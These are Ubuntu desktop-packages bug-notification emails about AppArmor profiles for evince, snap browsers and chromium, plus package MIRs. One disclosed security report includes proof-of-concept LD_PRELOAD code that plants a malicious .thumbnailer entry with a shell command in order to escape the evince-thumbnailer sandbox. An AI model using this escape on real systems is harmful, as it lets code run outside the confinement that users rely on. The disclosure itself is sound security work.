DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
It looks like the path changed. We have a rule for this already: owner /tmp/.gnome_desktop_thumbnail.* w, I'll adjust. ** Changed in: evince (Ubuntu) Status: New => In Progress ** Changed in: evince (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: In Progress Bug description: While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1795536] Re: Cannot open new window
This is fixed in https://launchpad.net/ubuntu/+source/evince/3.30.0-3ubuntu1 ** Changed in: evince (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1795536 Title: Cannot open new window Status in evince package in Ubuntu: Fix Released Bug description: If I launch evince and then try to open a new window by using the menu in evince nothing happens. Also the new window entry is missing in the right click menu of the launcher. When I try to open a new window from the Evince menu the following appears in the system log: [ 3432.193280] audit: type=1400 audit(1537816996.565:31): apparmor="DENIED" operation="exec" profile="/usr/bin/evince" name="/usr/lib/x86_64-linux-gnu/glib-2.0/gio-launch-desktop" pid=11689 comm="evince" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0 PD: I'm running debian testing, I've reported the issue here https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=909531 but no ack so far. I noticed that the apparmor profile comes from ubuntu so I tought this migh be a better place to report. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1795536/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
I referenced the wrong bug in the evince upload so it didn't auto-close, but 3.30.0-3ubuntu1 should address this. ** Changed in: evince (Ubuntu Cosmic) Status: Fix Committed => Fix Released ** Changed in: evince (Ubuntu Trusty) Status: Triaged => In Progress ** Changed in: evince (Ubuntu Xenial) Status: Triaged => In Progress ** Changed in: evince (Ubuntu Bionic) Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1788929 Title: Debian/Ubuntu AppArmor policy gaps in evince Status in AppArmor: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in evince package in Ubuntu: Fix Released Status in apparmor source package in Trusty: Fix Committed Status in evince source package in Trusty: In Progress Status in apparmor source package in Xenial: Fix Committed Status in evince source package in Xenial: In Progress Status in apparmor source package in Bionic: Fix Committed Status in evince source package in Bionic: In Progress Status in apparmor source package in Cosmic: Fix Released Status in evince source package in Cosmic: Fix Released Bug description: [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...] Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation: https://twitter.com/alex_murray/status/1032780425834446849 https://twitter.com/alex_murray/status/1032796879640190976 This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted: /usr/bin/evince-thumbnailer { [...] # Lenient, but remember we still have abstractions/private-files-strict in # effect). @{HOME}/ r, owner @{HOME}/** rw, owner /media/** rw, } As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc: [...] # don't allow reading/updating of run control files deny @{HOME}/.*rc mrk, audit deny @{HOME}/.*rc wl, # bash deny @{HOME}/.bash* mrk, audit deny @{HOME}/.bash* wl, deny @{HOME}/.inputrc mrk, audit deny @{HOME}/.inputrc wl, [...] Verification: user@ubuntu-18-04-vm:~$ cat preload2.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); int fd = open("/home/user/.bashrc", O_WRONLY); if (fd != -1) { printf("success\n"); } else { perror("open .bashrc"); } exit(0); } user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer constructor running from evince-thumbnailer open .bashrc: Permission denied user@ubuntu-18-04-vm:~$ dmesg|tail -n1 [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus. To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer: user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/ ls: cannot access '.local/share/thumbnailers/': No such file or directory user@ubuntu-18-04-vm:~$ cat preload3.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST) err(1, "mkdir"); FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w"); if (!f)
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy for evince is useless
** Changed in: evince (Ubuntu Cosmic) Status: Triaged => Fix Committed ** Summary changed: - Debian/Ubuntu AppArmor policy for evince is useless + Debian/Ubuntu AppArmor policy gaps in evince ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1788929 Title: Debian/Ubuntu AppArmor policy gaps in evince Status in AppArmor: Fix Released Status in apparmor package in Ubuntu: Fix Committed Status in evince package in Ubuntu: Fix Committed Status in apparmor source package in Trusty: Fix Committed Status in evince source package in Trusty: Triaged Status in apparmor source package in Xenial: Fix Committed Status in evince source package in Xenial: Triaged Status in apparmor source package in Bionic: Fix Committed Status in evince source package in Bionic: Triaged Status in apparmor source package in Cosmic: Fix Committed Status in evince source package in Cosmic: Fix Committed Bug description: [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...] Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation: https://twitter.com/alex_murray/status/1032780425834446849 https://twitter.com/alex_murray/status/1032796879640190976 This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted: /usr/bin/evince-thumbnailer { [...] # Lenient, but remember we still have abstractions/private-files-strict in # effect). @{HOME}/ r, owner @{HOME}/** rw, owner /media/** rw, } As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc: [...] # don't allow reading/updating of run control files deny @{HOME}/.*rc mrk, audit deny @{HOME}/.*rc wl, # bash deny @{HOME}/.bash* mrk, audit deny @{HOME}/.bash* wl, deny @{HOME}/.inputrc mrk, audit deny @{HOME}/.inputrc wl, [...] Verification: user@ubuntu-18-04-vm:~$ cat preload2.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); int fd = open("/home/user/.bashrc", O_WRONLY); if (fd != -1) { printf("success\n"); } else { perror("open .bashrc"); } exit(0); } user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer constructor running from evince-thumbnailer open .bashrc: Permission denied user@ubuntu-18-04-vm:~$ dmesg|tail -n1 [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus. To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer: user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/ ls: cannot access '.local/share/thumbnailers/': No such file or directory user@ubuntu-18-04-vm:~$ cat preload3.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST) err(1, "mkdir"); FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w"); if (!f) err(1, "create"); fputs("[Thumbnailer Entry]\n", f); fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat [...] } As a
[Desktop-packages] [Bug 1742743] Re: [MIR] woff2
Since this has an ACK from both MIR and security, marking Fix Committed. ** Changed in: woff2 (Ubuntu) Status: New => Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to webkit2gtk in Ubuntu. https://bugs.launchpad.net/bugs/1742743 Title: [MIR] woff2 Status in webkit2gtk package in Ubuntu: Fix Committed Status in woff2 package in Ubuntu: Fix Committed Bug description: Availability Built for all supported architectures. In sync with Debian. Rationale = woff2 is a library maintained by Google to convert fonts from TTF to the woff2 format and decompress from woff2 to TTF. The WOFF 2.0 format uses the Brotli compression algorithm to compress fonts suitable for use in CSS @font-face rules. WOFF 2.0 is a W3C Candidate Recommendation. See the brotli MIR at LP: #1737053. brotli and woff2 are libraries that are technically already in main because they are bundled in Firefox and webkit2gtk. The next major stable release of webkit2gtk, 2.20, will be released in March. It drops those 2 bundled libraries. I think our options are basically 1) Bundle those libraries anyway, or 2) Approve this MIR, or 3) Drop support for the WOFF2 format in webkit2gtk Security I assume we want a security review here. https://security-tracker.debian.org/tracker/source-package/woff2 https://launchpad.net/ubuntu/+source/woff2/+cve Quality assurance = - Ubuntu Desktop Bugs is subscribed. - No test suite - No autopkgtests https://bugs.launchpad.net/ubuntu/+source/woff2 https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=woff2 https://github.com/google/woff2/issues Dependencies Only universe binary dependency is brotli (LP: #1737053) Standards compliance 4.1.2, debhelper compat 10, dh7 simple rules Maintenance === Actively maintained: https://github.com/google/woff2 Maintained by the Debian Fonts Team in Debian. It's a small team so it may need co-maintenance help from the Ubuntu Desktop team. Other Info == woff2 was only packaged in Debian and Ubuntu very recently. webkit2gtk is managed similar to Firefox and Chromium. So far, new releases are pushed to Ubuntu 16.04 LTS and newer as security updates, but the Ubuntu Security Team does not guarantee security support for webkit2gtk. We are going to need to backport brotli and woff2 into main as security updates for 16.04 LTS and 17.10. Packaging is at https://salsa.debian.org/fonts-team/woff2/tree/debian/unstable/debian To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/webkit2gtk/+bug/1742743/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
I went through this the other day with a personal profile. We probably can do something along the lines of: /{,snap/core/[0-9]*/}usr/bin/snap mrCx -> snap_browser, profile snap_browser { #include /etc/passwd r, /etc/group r, /etc/nsswitch.conf r, /dev/tty rw, # noisy deny network inet stream, deny network inet6 stream, deny owner /run/user/[0-9]*/gdm/Xauthority r, # not needed on Ubuntu /{,snap/core/[0-9]*/}usr/bin/snap mrix, # re-exec /etc/fstab r, @{PROC}/sys/net/core/somaxconn r, @{PROC}/sys/kernel/seccomp/actions_avail r, owner @{PROC}/@{pid}/mountinfo r, owner @{HOME}/.snap/auth.json r, # if exists, required /run/snapd.socket rw, /snap/core/[0-9]*/usr/lib/snapd/info r, /snap/core/[0-9]*/usr/lib/snapd/snapd r, /var/lib/snapd/system-key r, /{,snap/core/*/}usr/lib/snapd/snap-confine Pix, /sys/kernel/security/apparmor/features/ r, # allow launching official browser snaps. This could be abstracted into an #include or tunable /snap/chromium/*/meta/snap.yaml r, /snap/firefox/*/meta/snap.yaml r, # ... } -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in evince package in Ubuntu: New Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1738164] Re: [snap] U2F doesn't work with yubikey
The actual rules would be: # for U2F yubikey /run/udev/data/c238:[0-9]* r, /run/udev/data/c239:[0-9]* r, /run/udev/data/c240:[0-9]* r, but using the redundant rules from the previous comment is fine too. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1738164 Title: [snap] U2F doesn't work with yubikey Status in chromium-browser package in Ubuntu: Confirmed Bug description: (initially reported by Daniel at https://forum.snapcraft.io/t/call- for-testing-chromium-62-0-3202-62/2569/50) « U2F (Universal 2nd Factor) isn’t working when signing into my gmail account trying to use my yubikey. This is a USB device which IIRC chromium needs bidirectional communication with. » This requires investigation, but the yubikey I have is too old and doesn't support U2F. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1738164] Re: [snap] U2F doesn't work with yubikey
We can add this to browser-support: # for U2F yubikey /run/udev/data/c238:[0-9]* r, /run/udev/data/c239:[0-9]* r, /run/udev/data/c240:[0-9]* r, /run/udev/data/c240:[0-9]* r, /run/udev/data/c240:[0-9]* r, Can someone experiencing this issue adjust /var/lib/snapd/apparmor/profiles/snap.chromium.chromium to have the above, and then run: sudo apparmor_parser -r /var/lib/snapd/apparmor/profiles/snap.chromium.chromium and report back if the issue is resolved? If not, please paste any other apparmor denials. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1738164 Title: [snap] U2F doesn't work with yubikey Status in chromium-browser package in Ubuntu: Confirmed Bug description: (initially reported by Daniel at https://forum.snapcraft.io/t/call- for-testing-chromium-62-0-3202-62/2569/50) « U2F (Universal 2nd Factor) isn’t working when signing into my gmail account trying to use my yubikey. This is a USB device which IIRC chromium needs bidirectional communication with. » This requires investigation, but the yubikey I have is too old and doesn't support U2F. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1709164] Re: [MIR] bubblewrap
** Changed in: bubblewrap (Ubuntu) Assignee: Seth Arnold (seth-arnold) => Alex Murray (alexmurray) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bubblewrap in Ubuntu. https://bugs.launchpad.net/bugs/1709164 Title: [MIR] bubblewrap Status in bubblewrap package in Ubuntu: Triaged Bug description: Availability Built for all supported architectures. In sync with Debian. Rationale = The gnome-desktop3 library 3.25.90+ requires bubblewrap. bubblewrap is most commonly used as part of Flatpak's security isolation feature. Here it's being used to sandbox the thumbnailers. See https://git.gnome.org/browse/gnome-desktop/log (changes from 3.25.4 to 3.25.90) The bubblewrap feature was disabled in Ubuntu 17.10's gnome-desktop3 package because this MIR was not processed. Security No known open security vulnerabilities in any Ubuntu releases. https://security-tracker.debian.org/tracker/source-package/bubblewrap I helped prepare a security update (LP: #1657357) (CVE-2017-5226) for bubblewrap/flatpak several months ago. Security-sensitive package. Quality assurance = Bug subscriber: should be Ubuntu Desktop Bugs https://bugs.launchpad.net/ubuntu/+source/bubblewrap https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=bubblewrap https://github.com/projectatomic/bubblewrap/issues dh_auto_test runs the build tests but they appear to be set as SKIP upstream. (See comment #4) Multiple autopkgtests passing on all Ubuntu architectures. Because the tests require machine isolation, the autopkgtests don't run on Debian's infrastructure currently. Dependencies check-mir reports all other binary dependencies are in main Standards compliance 4.0.0 Maintenance === - Actively developed upstream https://github.com/projectatomic/bubblewrap - Maintained in Debian by the pkg-utopia team but more specifically, it is maintained by Simon McVittie (smcv) who also maintains Flatpak and ostree in Debian and Ubuntu. short dh7 style rules, dh compat 10 Background information == William Hua (attente) had been working last year on a snapcraft plugin that used bubblewrap. So maybe more stuff will use bubblewrap in the future. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/bubblewrap/+bug/1709164/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1709164] Re: [MIR] bubblewrap
FYI, while this is currently assigned to Seth, I do want to note that bubblewrap is setuid so it is going to require extra scrutiny (incidentally this was not called out in this bug's description). Regardless of the outcome of the bubblewrap review, the sandboxing feature is highly desirable so we'll be sure to outline a path forward so these thumbnailers can run in a restricted environment. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bubblewrap in Ubuntu. https://bugs.launchpad.net/bugs/1709164 Title: [MIR] bubblewrap Status in bubblewrap package in Ubuntu: Triaged Bug description: Availability Built for all supported architectures. In sync with Debian. Rationale = The gnome-desktop3 library 3.25.90+ requires bubblewrap. bubblewrap is most commonly used as part of Flatpak's security isolation feature. Here it's being used to sandbox the thumbnailers. See https://git.gnome.org/browse/gnome-desktop/log (changes from 3.25.4 to 3.25.90) The bubblewrap feature was disabled in Ubuntu 17.10's gnome-desktop3 package because this MIR was not processed. Security No known open security vulnerabilities in any Ubuntu releases. https://security-tracker.debian.org/tracker/source-package/bubblewrap I helped prepare a security update (LP: #1657357) (CVE-2017-5226) for bubblewrap/flatpak several months ago. Security-sensitive package. Quality assurance = Bug subscriber: should be Ubuntu Desktop Bugs https://bugs.launchpad.net/ubuntu/+source/bubblewrap https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=bubblewrap https://github.com/projectatomic/bubblewrap/issues dh_auto_test runs the build tests but they appear to be set as SKIP upstream. (See comment #4) Multiple autopkgtests passing on all Ubuntu architectures. Because the tests require machine isolation, the autopkgtests don't run on Debian's infrastructure currently. Dependencies check-mir reports all other binary dependencies are in main Standards compliance 4.0.0 Maintenance === - Actively developed upstream https://github.com/projectatomic/bubblewrap - Maintained in Debian by the pkg-utopia team but more specifically, it is maintained by Simon McVittie (smcv) who also maintains Flatpak and ostree in Debian and Ubuntu. short dh7 style rules, dh compat 10 Background information == William Hua (attente) had been working last year on a snapcraft plugin that used bubblewrap. So maybe more stuff will use bubblewrap in the future. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/bubblewrap/+bug/1709164/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1709164] Re: [MIR] bubblewrap
I'm coming up to speed on this issue now and have discussed this with Jamie Bennett, the security team and various stakeholders to unblock this MIR. The security team will prioritize this MIR for 18.10. Assuming it passing review, I would encourage the Ubuntu Desktop team to SRU this back to at least 18.04 LTS so users can benefit from the sandboxing feature. ** Changed in: bubblewrap (Ubuntu) Assignee: Ubuntu Security Team (ubuntu-security) => Seth Arnold (seth-arnold) ** Changed in: bubblewrap (Ubuntu) Status: Confirmed => Triaged ** Changed in: bubblewrap (Ubuntu) Importance: Undecided => High -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bubblewrap in Ubuntu. https://bugs.launchpad.net/bugs/1709164 Title: [MIR] bubblewrap Status in bubblewrap package in Ubuntu: Triaged Bug description: Availability Built for all supported architectures. In sync with Debian. Rationale = The gnome-desktop3 library 3.25.90+ requires bubblewrap. bubblewrap is most commonly used as part of Flatpak's security isolation feature. Here it's being used to sandbox the thumbnailers. See https://git.gnome.org/browse/gnome-desktop/log (changes from 3.25.4 to 3.25.90) The bubblewrap feature was disabled in Ubuntu 17.10's gnome-desktop3 package because this MIR was not processed. Security No known open security vulnerabilities in any Ubuntu releases. https://security-tracker.debian.org/tracker/source-package/bubblewrap I helped prepare a security update (LP: #1657357) (CVE-2017-5226) for bubblewrap/flatpak several months ago. Security-sensitive package. Quality assurance = Bug subscriber: should be Ubuntu Desktop Bugs https://bugs.launchpad.net/ubuntu/+source/bubblewrap https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=bubblewrap https://github.com/projectatomic/bubblewrap/issues dh_auto_test runs the build tests but they appear to be set as SKIP upstream. (See comment #4) Multiple autopkgtests passing on all Ubuntu architectures. Because the tests require machine isolation, the autopkgtests don't run on Debian's infrastructure currently. Dependencies check-mir reports all other binary dependencies are in main Standards compliance 4.0.0 Maintenance === - Actively developed upstream https://github.com/projectatomic/bubblewrap - Maintained in Debian by the pkg-utopia team but more specifically, it is maintained by Simon McVittie (smcv) who also maintains Flatpak and ostree in Debian and Ubuntu. short dh7 style rules, dh compat 10 Background information == William Hua (attente) had been working last year on a snapcraft plugin that used bubblewrap. So maybe more stuff will use bubblewrap in the future. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/bubblewrap/+bug/1709164/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1697800] Re: [regression] firefox dies with SIGILL on machines without SSE2
** Changed in: firefox (Ubuntu) Assignee: Canonical Security Team (canonical-security) => Ubuntu Security Team (ubuntu-security) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1697800 Title: [regression] firefox dies with SIGILL on machines without SSE2 Status in firefox package in Ubuntu: Confirmed Bug description: I'm running Ubuntu 16.04 on an old laptop. Firefox used to work on fine until I did an 'apt upgrade'. Worked: 50.1.0+build2-0ubuntu0.16.04.1 Fails: 53.0.3+build1-0ubuntu0.16.04.2 The bug was a little tricky to track down since AppArmor was killing firefox. I believe the AppArmor error is irrelevant for this bug report, but I mention it for completeness (and so other people can google for this problem): "/usr/bin/python3: error while loading shared libraries: cannot apply additional memory protection after relocation: Permission denied" I disabled AppArmor (aa-disable '/usr/lib/firefox/firefox{,*[^s][^h]}') and now Firefox dies like so: ExceptionHandler::GenerateDump cloned child 14258 ExceptionHandler::SendContinueSignalToChild sent continue signal to child ExceptionHandler::WaitForContinueSignal waiting for continue signal... Failed to open curl lib from binary, use libcurl.so instead Using gdb to figure it out, I see that the process is getting SIGILL (Illegal Instruction). To figure out exactly which instruction is the problem, I ran gdb as follows: $ gdb /usr/lib/firefox/firefox GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1 [...] Reading symbols from /usr/lib/firefox/firefox...(no debugging symbols found)...done. (gdb) set disassemble-next-line on (gdb) run Starting program: /usr/lib/firefox/firefox [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". [New Thread 0xb15c4b40 (LWP 14296)] [Thread 0xb15c4b40 (LWP 14296) exited] warning: Corrupted shared library list: 0xb794cc00 != 0xb794b800 [...] Thread 1 "firefox" received signal SIGILL, Illegal instruction. 0x4b9f826c in ?? () => 0x4b9f826c: f2 0f 11 74 24 30 movsd %xmm6,0x30(%esp) MOVSD is an SSE2 instruction, which my machine does not support. $ grep flags /proc/cpuinfo flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pse36 mmx fxsr sse I had been under the impression that firefox is supposed to only use SSE2 if it is available. Is that not correct? It certainly used to work. Perhaps there is something wrong in how Ubuntu is building the binary. [Side note: There are actually two "movsd" instructions for the Intel x86 architecture. The original one (Move String, opcode A5) is supported by everything back to the 80386, but this one (Move Scalar, opcode F2 0F 11) requires SSE2. Maybe that is the source of the confusion.] Thank you. $ lsb_release -rd Description:Ubuntu 16.04.2 LTS Release:16.04 $ apt-cache policy firefox firefox: 